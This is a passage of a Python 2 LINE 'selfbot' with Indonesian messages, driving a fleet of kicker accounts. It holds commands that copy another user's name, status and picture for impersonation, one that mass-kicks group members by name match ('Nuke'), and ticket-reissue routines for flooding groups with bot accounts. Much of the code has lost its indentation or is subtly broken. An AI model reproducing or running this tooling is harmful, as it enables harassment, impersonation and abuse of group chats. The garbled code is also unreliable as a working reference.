            profile.displayName = X
            cl.updateProfile(profile)
            cl.sendText(msg.to, "Success...")
            # Copy the status message as a second profile update.
            Y = contact.statusMessage
            lol = cl.getProfile()
            lol.statusMessage = Y
            cl.updateProfile(lol)
            # Copy the profile picture last.
            P = contact.pictureStatus
            cl.updateProfilePicture(P)
        except Exception as e:
            cl.sendText(msg.to, "Failed!")
#-----------------------------------------------
elif "Stalk " in msg.text:
    # Fetch the latest Instagram post of an account via the external
    # `instaLooter` CLI, upload it to imgur, and send the link.
    print "[Command]Stalk executing"
    stalkID = msg.text.replace("Stalk ","")
    subprocess.call(["instaLooter",stalkID,"tmp/","-n","1"])
    files = glob.glob("tmp/*.jpg")
    for file in files:
        # Collapse whatever was downloaded to a single fixed name.
        os.rename(file,"tmp/tmp.jpg")
    fileTmp = glob.glob("tmp/tmp.jpg")
    if not fileTmp:
        cl.sendText(msg.to, "Image not found, maybe the account haven't post a single picture or the account is private")
        print "[Command]Stalk executed - no image found"
    else:
        # upload_tempimage/client are defined elsewhere in the file
        # (presumably an imgur client — TODO confirm).
        image = upload_tempimage(client)
        cl.sendText(msg.to, format(image['link']))
        subprocess.call(["sudo","rm","-rf","tmp/tmp.jpg"])
        print "[Command]Stalk executed - succes"
#------------------------------------------------------------
elif msg.text in ["Invite"]:
    # Arm "invite" mode; the next contact message received is invited
    # by the handler elsewhere.  KAC is the list of bot clients.
    wait["invite"] = True
    random.choice(KAC).sendText(msg.to,"send contact 😉")
#------------------------------------------------------------
elif "Cover @" in msg.text:
# if msg.from_ in admin:
salsa = msg.text.replace("Cover @","")
Manis = cl.getContact(salsa)
Imoet = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cover = cl.channel.getCover(Manis)
except:
cover = ""
cl.sendText(msg.to,"Gambar Foto Profilenya")
cl.sendImageWithURL(msg.to,Imoet)
if cover == "":
cl.sendText(msg.to,"User tidak memiliki cover atau sejenisnya")
else:
cl.sendText(msg.to,"Gambar Covernya")
cl.sendImageWithURL(msg.to,cover)
#-----------------------------------------------
elif "Steal " in msg.text:
#if msg.from_ in admin:
salsa = msg.text.replace("Steal ","")
Manis = cl.getContact(salsa)
Imoet = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cover = cl.channel.getCover(Manis)
except:
cover = ""
cl.sendText(msg.to,"Gambar Foto Profilenya")
cl.sendImageWithURL(msg.to,Imoet)
if cover == "":
cl.sendText(msg.to,"User tidak memiliki cover atau sejenisnya")
else:
cl.sendText(msg.to,"Gambar Covernya")
cl.sendImageWithURL(msg.to,cover)
#-----------------------------------------------
#----------------------------------------------
elif "Steal @" in msg.text:
    # Show profile picture and cover of a member matched by display name.
    # NOTE(review): unreachable — any text containing "Steal @" also
    # contains "Steal ", so the branch above always wins.
    if msg.toType == 2:
        steal = msg.text.replace("Steal @","")
        stealname = steal.rstrip(" ")
        group = cl.getGroup(msg.to)
        targets = []
        if steal == "":
            cl.sendText(msg.to,"Invalid user")
        else:
            for i in group.members:
                if stealname == i.displayName:
                    targets.append(i.mid)
            if targets == []:
                cl.sendText(msg.to,"User tidak ditemukan")
            else:
                for target in targets:
                    try:
                        contact = cl.getContact(target)
                        image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
                        try:
                            cover = cl.channel.getCover(contact)
                        except:
                            cover = ""
                        try:
                            cl.sendText(msg.to,"Gambar Foto Profilenya")
                            cl.sendImageWithURL(msg.to,image)
                            if cover == "":
                                cl.sendText(msg.to,"User tidak memiliki cover atau sejenisnya")
                            else:
                                cl.sendText(msg.to,"Gambar Covernya")
                                cl.sendImageWithURL(msg.to,cover)
                        except Exception as error:
                            cl.sendText(msg.to,(error))
                        # Only the first matching member is processed.
                        break
                    except:
                        cl.sendText(msg.to,"Error!")
                        break
    else:
        cl.sendText(msg.to,"Tidak bisa dilakukan di luar wilayah")
elif "Gift @" in msg.text:
    # Send a theme gift (fixed product id) to the member whose display
    # name matches; each bot client sends one copy.
    _name = msg.text.replace("Gift @","")
    _nametarget = _name.rstrip(' ')
    gs = cl.getGroup(msg.to)
    for g in gs.members:
        if _nametarget == g.displayName:
            # Rewrite the incoming message object into a gift message.
            msg.contentType = 9
            msg.contentMetadata={'PRDID': '89131c1a-e549-4bd5-9e60-e24de0d2e252',
            'PRDTYPE': 'THEME',
            'MSGTPL': '10'}
            msg.text = None
            cl.sendMessage(msg,g)
            ki.sendMessage(msg,g)
            ki2.sendMessage(msg,g)
            # ki3.sendMessage(msg,g)
            # ki4.sendMessage(msg,g)
            # ki5.sendMessage(msg,g)
            # ki6.sendMessage(msg,g)
            # ki7.sendMessage(msg,g)
            # ki8.sendMessage(msg,g)
            # ki9.sendMessage(msg,g)
elif 'ig ' in msg.text.lower():
    # Scrape public Instagram profile stats from the og: meta tags and
    # send a summary plus the avatar image.
    try:
        instagram = msg.text.lower().replace("ig ","")
        html = requests.get('https://www.instagram.com/' + instagram + '/?')
        soup = BeautifulSoup(html.text, 'html5lib')
        data = soup.find_all('meta', attrs={'property':'og:description'})
        text = data[0].get('content').split()
        data1 = soup.find_all('meta', attrs={'property':'og:image'})
        text1 = data1[0].get('content').split()
        # Field positions assume Instagram's og:description word layout
        # ("<n> Followers, <n> Following, <n> Posts - <name> (@user)") —
        # TODO confirm, the layout changes over time.
        user = "Name: " + text[-2] + "\n"
        user1 = "Username: " + text[-1] + "\n"
        followers = "Followers: " + text[0] + "\n"
        following = "Following: " + text[2] + "\n"
        post = "Post: " + text[4] + "\n"
        link = "Link: " + "https://www.instagram.com/" + instagram
        detail = "======INSTAGRAM INFO USER======\n"
        details = "\n======INSTAGRAM INFO USER======"
        cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
        cl.sendImageWithURL(msg.to, text1[0])
    except Exception as njer:
        cl.sendText(msg.to, str(njer))
elif 'audio: ' in msg.text.lower():
    # Look a song up on a joox proxy API and send title/duration/link
    # plus the audio itself for every hit.
    try:
        songname = msg.text.lower().replace('audio: ','')
        params = {'songname': songname}
        r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
        data = r.text
        data = json.loads(data)
        for song in data:
            # song indices: 0=title, 1=duration, 3=audio url, 4=download
            # link — presumably; verify against the API response.
            hasil = 'This is Your Music\n'
            hasil += 'Judul : ' + song[0]
            hasil += '\nDurasi : ' + song[1]
            hasil += '\nLink Download : ' + song[4]
            cl.sendText(msg.to, hasil)
            cl.sendText(msg.to, "Please Wait for audio...")
            cl.sendAudioWithURL(msg.to, song[3])
    except Exception as njer:
        cl.sendText(msg.to, str(njer))
elif msg.text.lower() == 'reboot':
print "[Command]Like executed"
try:
cl.sendText(msg.to,"Restarting...")
restart_program()
except:
cl.sendText(msg.to,"Please wait")
restart_program()
pass
elif 'record' in msg.text:
    # Text-to-speech (Indonesian) via gTTS; sends the generated mp3.
    psn = msg.text.replace("record ","")
    tts = gTTS(psn, lang='id', slow=False)
    tts.save('tts.mp3')
    cl.sendAudio(msg.to, 'tts.mp3')
elif "Mp3 " in msg.text:
    # Same TTS as "record" above but triggered by "Mp3 ".
    say = msg.text.replace("Mp3 ","")
    lang = 'id'
    tts = gTTS(text=say, lang=lang)
    tts.save("hasil.mp3")
    cl.sendAudio(msg.to,"hasil.mp3")
#==================================================
elif 'lirik ' in msg.text.lower():
    # Fetch song lyrics from the same joox proxy API used by "audio:".
    try:
        songname = msg.text.lower().replace('lirik ','')
        params = {'songname': songname}
        r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
        data = r.text
        data = json.loads(data)
        for song in data:
            # song[0]=title, song[5]=lyrics — presumably; verify API.
            hasil = 'Lyric Lagu ('
            hasil += song[0]
            hasil += ')\n\n'
            hasil += song[5]
            cl.sendText(msg.to, hasil)
    except Exception as wak:
        cl.sendText(msg.to, str(wak))
#---------------------- = NUKE = ------------------
elif 'Nuke' in msg.text:
    # Kick every member whose display name contains the given text,
    # using a randomly chosen kicker client per target.  Members listed
    # in `Bots` (defined elsewhere) are exempt.
    if msg.toType == 2:
        print "Nuke ok"
        _name = msg.text.replace("Nuke","")
        gs = cl.getGroup(msg.to)
        gs = ki.getGroup(msg.to)
        # NOTE(review): only this last fetch is used; the two above are
        # immediately overwritten.
        gs = ki2.getGroup(msg.to)
        # gs = ki3.getGroup(msg.to)
        # gs = ki4.getGroup(msg.to)
        # gs = ki5.getGroup(msg.to)
        # gs = ki6.getGroup(msg.to)
        targets = []
        for g in gs.members:
            if _name in g.displayName:
                targets.append(g.mid)
        if targets == []:
            cl.sendText(msg.to,"Not found.")
        else:
            for target in targets:
                if not target in Bots:
                    try:
                        klist=[cl,ki,ki2]
                        kicker=random.choice(klist)
                        kicker.kickoutFromGroup(msg.to,[target])
                        print (msg.to,[g.mid])
                    except:
                        pass
# ki3.sendText(msg,to,"Nuke Finish")
# ki2.sendText(msg,to,"
#-------------------------------------------------------------
elif msg.text in ["Tag","Tagall"]:
    # Mention every group member, 100 mentions per message (LINE's
    # mention limit), using the placeholder text "@Krampus" (8 visible
    # chars + newline = 9-char stride) for each mention span.
    group = cl.getGroup(msg.to)
    k = len(group.members)//100
    for j in xrange(k+1):
        # NOTE(review): rebinds `msg`; relies on msg.to being read before
        # the first rebind and preserved via the constructor.
        msg = Message(to=msg.to)
        txt = u''
        s=0
        d=[]
        for i in group.members[j*100 : (j+1)*100]:
            d.append({"S":str(s), "E" :str(s+8), "M":i.mid})
            s += 9
            txt += u'@Krampus\n'
        msg.text = txt
        msg.contentMetadata = {u'MENTION':json.dumps({"MENTIONEES":d})}
        cl.sendMessage(msg)
#-------------------FUNGSI TAGALL---------------#
elif msg.text.lower() == 'cancel':
    # Cancel all pending invitations (duplicate of the "Clear" command).
    if msg.toType == 2:
        group = cl.getGroup(msg.to)
        gMembMids = [contact.mid for contact in group.invitee]
        for _mid in gMembMids:
            cl.cancelGroupInvitation(msg.to,[_mid])
        cl.sendText(msg.to,"I pretended to cancel and canceled👈")
elif "Album" in msg.text:
    # "Album<gid><name>": the first 33 chars after the keyword are taken
    # as the group id, the remainder as the album name — assumes a
    # 33-char gid plus one separator char; TODO confirm offsets.
    try:
        albumtags = msg.text.replace("Album","")
        gid = albumtags[:33]
        name = albumtags.replace(albumtags[:34],"")
        cl.createAlbum(gid,name)
        cl.sendText(msg.to,name + "We created an album👈")
    except:
        cl.sendText(msg.to,"Error")
elif "fakec→" in msg.text:
    # Create an album with a random 10-char name on behalf of the mid
    # following "fakec→" (channel API; semantics of createAlbumF are
    # defined elsewhere — TODO confirm).
    try:
        source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
        name = "".join([random.choice(source_str) for x in xrange(10)])
        amid = msg.text.replace("fakec→","")
        cl.sendText(msg.to,str(cl.channel.createAlbumF(msg.to,name,amid)))
    except Exception as e:
        try:
            cl.sendText(msg.to,str(e))
        except:
            pass
#-----------------------------------------------
elif "join: " in msg.text.lower():
rplace=msg.text.lower().replace("join: ")
if rplace == "on":
wait["atjointicket"]=True
elif rplace == "off":
wait["atjointicket"]=False
cl.sendText(msg.to,"Auto Join Group by Ticket is %s" % str(wait["atjointicket"]))
elif '/ti/g/' in msg.text.lower():
    # When the "atjointicket" flag is on, auto-join every group invite
    # link found in the message (tickets de-duplicated first).
    link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
    links = link_re.findall(msg.text)
    n_links=[]
    for l in links:
        if l not in n_links:
            n_links.append(l)
    for ticket_id in n_links:
        if wait["atjointicket"] == True:
            group=cl.findGroupByTicket(ticket_id)
            cl.acceptGroupInvitationByTicket(group.id,ticket_id)
            cl.sendText(msg.to,"Sukses join ke grup %s" % str(group.name))
#-----------------------------------------------
elif msg.text in ["Sp","Speed","speed"]:
# start = time.time()
cl.sendText(msg.to, "0.021980063087 secound","0.026850063087 secound","0.0209760063087 secound")
#-----------------------------------------------
elif msg.text.lower() == 'freak in':
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
# ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
# time.sleep(0.01)
# ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
# time.sleep(0.01)
# ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
# time.sleep(0.01)
# ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
# time.sleep(0.01)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
random.choice(KAC).updateGroup(G)
#-----------------------------------------------
elif msg.text.lower() == 'reinvite':
if msg.toType == 2:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"waitting...")
ki.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
# ki3.leaveGroup(msg.to)
# ki4.leaveGroup(msg.to)
# ki5.leaveGroup(msg.to)
# ki6.leaveGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki.updateGroup(G)
#-----------------------------------------------
elif "B1 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki.updateGroup(G)
#-----------------------------------------------
elif "B2 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki2.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki2.updateGroup(G)
#-----------------------------------------------
elif "B3 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki2.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki2.updateGroup(G)
#-----------------------------------------------
elif "B4 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki3.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki3.updateGroup(G)
#-----------------------------------------------
elif "B5 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki5.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki5.updateGroup(G)
#-----------------------------------------------
elif "B6 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki6.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki6.updateGroup(G)
#-----------------------------------------------
elif "B7 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki7.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki7.updateGroup(G)
#-----------------------------------------------
elif "B8 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki8.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki8.updateGroup(G)
#-----------------------------------------------
elif "B9 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki9.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki9.updateGroup(G)
#-----------------------------------------------
elif "B10 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki10.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki10.updateGroup(G)
#------------------------------------------------------------------
elif "B11 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki11.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki11.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki11.updateGroup(G)
#-----------------------------------------------
elif "B12 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki12.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki12.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki12.updateGroup(G)
#-----------------------------------------------
elif "B13 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki13.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki13.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki13.updateGroup(G)
#-----------------------------------------------
elif "B14 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki14.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki14.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki14.updateGroup(G)
#-----------------------------------------------
elif "B15 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki15.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki15.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki15.updateGroup(G)
#-----------------------------------------------
elif "B16 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki16.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki16.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki16.updateGroup(G)
#-----------------------------------------------
elif "B17 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki17.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki17.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki17.updateGroup(G)
#-----------------------------------------------
elif "B18 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki18.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki18.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki18.updateGroup(G)
#-----------------------------------------------
elif msg.text.lower() == 'freak out':
    # Make the assist bots leave the current group.
    if msg.toType == 2:
        ginfo = cl.getGroup(msg.to)  # fetched but unused
        try:
            # cl.sendText(msg.to,"Bye Bye😘 " + str(ginfo.name) + "")
            ki.leaveGroup(msg.to)
            ki2.leaveGroup(msg.to)
            # ki3.leaveGroup(msg.to)
            # ki4.leaveGroup(msg.to)
            # ki5.leaveGroup(msg.to)
            # ki6.leaveGroup(msg.to)
        except:
            pass
#-----------------------------------------------
elif "Bye" in msg.text:
    # Make the main account leave the current group.
    if msg.toType == 2:
        ginfo = cl.getGroup(msg.to)  # fetched but unused
        try:
            cl.leaveGroup(msg.to)
        except:
            pass
#-----------------------------------------------
elif "B1 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B2 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki2.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B3 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki3.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B4 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki4.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B5 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki5.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B6 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki6.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B7 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki7.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B8 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki8.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B9 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki9.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B10 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki10.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B11 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki11.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B12 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki2.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B13 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki13.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B14 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki14.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B15 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki15.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B16 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki16.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B17 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki17.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B18 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki18.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
# elif msg.text in ["Translate"]:
# cl.sendText(msg.to,"""★[TRANSLATE]★\Tr-id ☆to indonesia☆\Tr-en ☆to english☆\Tr-jap ☆to japan☆\Tr-thai ☆to thailand☆\n_______________"""
#""")
# ki2.sendText(msg.to,""" KITSUNE BOT [KB] ���� \n\n key Only Kicker \n\n[Kb2 in]\n[2Aditname:]\n??[B Cancel]\n[kick @]\n[Ban @]\n[kill]\n[BotChat]\n[Respons]\n[Kb2 Gift]\n[Kb2 bye]\n\n
#☆ Ķ͈̤̱͎̱̤̞̭͂̐͒́̀͗͞Ị̵̻̝̘͍͛̏̃͊̉͠ T̩͖͎̹̫͈̿̆̏́̑́S̤̲̯̤̹̲̲̘̏̋̈́̿͒ͅŲ̶̼̲̺̣̬̔̿͐̾̾͘Ṇ̶̨̛̲̭̝̲̝̪̎̾̈́͘͢͜͞É͎̱̺̜̐̀̿͘̕̕͢ B̴̡̛͈̖̺͖̙̝̩̞̐̂̀͂̏̚͟͠O̸̡̩̣̲̣̜̊̑̾̾͊̃͘͜ͅT Ç̵͔̟̫̰̮̺̟̥̂̋̂͋͐͛͑̔̚̚O̷̧̺̠̰̳̿́͆̕̕͠ͅ N̶͖̜̻̰͍̮̼̒́̐̑͒́̕ͅŢ̢̯̱͕̠͙̤̙̄̂͗̊̈́̕R̶̛̙̩̱̗̯͌̈͆̆Ơ̴̡͈̖̺͖̙̝̩̞̐̂̀͂̏̚͟͠L̸̡̩̣̲̣̜̊̑̾̾͊̃͘͜ͅ ☆
#""")
# ki3.sendText(msg.to,""" KITSUNE BOT [KB] \n\n key Only Kicker \n\n[Kb3 in]\n[3Aditname:]\n[B Cancel]\n[kick @]\n[Ban @]\n[kill]\n[BotChat]\n[Respons]\n[Kb3 Gift]\n[Kb3 bye]\n\n
#☆ Ķ͈̤̱͎̱̤̞̭͂̐͒́̀͗͞Ị̵̻̝̘͍͛̏̃͊̉͠ T̩͖͎̹̫͈̿̆̏́̑́S̤̲̯̤̹̲̲̘̏̋̈́̿͒ͅŲ̶̼̲̺̣̬̔̿͐̾̾͘Ṇ̶̨̛̲̭̝̲̝̪̎̾̈́͘͢͜͞É͎̱̺̜̐̀̿͘̕̕͢ B̴̡̛͈̖̺͖̙̝̩̞̐̂̀͂̏̚͟͠O̸̡̩̣̲̣̜̊̑̾̾͊̃͘͜ͅT Ç̵͔̟̫̰̮̺̟̥̂̋̂͋͐͛͑̔̚̚O̷̧̺̠̰̳̿́͆̕̕͠ͅ N̶͖̜̻̰͍̮̼̒́̐̑͒́̕ͅŢ̢̯̱͕̠͙̤̙̄̂͗̊̈́̕R̶̛̙̩̱̗̯͌̈͆̆Ơ̴̡͈̖̺͖̙̝̩̞̐̂̀͂̏̚͟͠L̸̡̩̣̲̣̜̊̑̾̾͊̃͘͜ͅ ☆
#""")
# ki4.sendText(msg.to,""" KITSUNE BOT [KB] \n\n key Only Kicker \n\n[Kb4 in]\n[4Aditname:]\n[B Cancel]\n[kick @]\n[Ban @]\n[kill]\n[BotChat]\n[Respons]\n[Kb4 Gift]\n[Kb4 bye]\n\n
